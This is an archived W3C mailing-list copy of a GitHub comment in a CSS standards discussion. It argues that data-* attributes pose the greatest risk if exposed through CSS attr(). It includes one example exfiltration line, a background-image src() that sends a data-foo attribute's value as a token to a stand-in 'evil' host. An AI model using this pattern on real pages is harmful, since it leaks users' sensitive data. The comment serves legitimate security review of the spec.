- From: Tab Atkins Jr. via GitHub <sysbot+gh@w3.org>
- Date: Mon, 15 Apr 2024 18:19:42 +0000
- To: public-css-archive@w3.org
> Requiring using data- attributes for custom elements would feel weird.
Note that `data-*` attributes are *not* safer to use, as this comment (and several others) seems to be implicitly assuming. They are, in fact, *the most dangerous* attributes to use, because they're the most likely to contain application-specific data that might be sensitive. The quickest path to an exploit with this feature is `background-image: src(string("http://example.com/evil?token=" attr(data-foo)));`; nearly any other usage or attribute is going to be dramatically safer. ^_^
There's only a handful of built-in attributes that have the potential to carry sensitive data: `nonce`, `value` attributes if you're using them to load up sensitive data at page load, and probably `src`/`href` values, particularly for `script`s.
(So, no, limiting data uris to being constructed only with data-* attributes is not a useful harm reduction. ^_^)
--
GitHub Notification of comment by tabatkins
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/9141#issuecomment-2057536843 using your GitHub account
--
Sent via github-notify-ml as configured in https://github.com/w3c/github-notify-ml-config
Received on Monday, 15 April 2024 18:19:43 UTC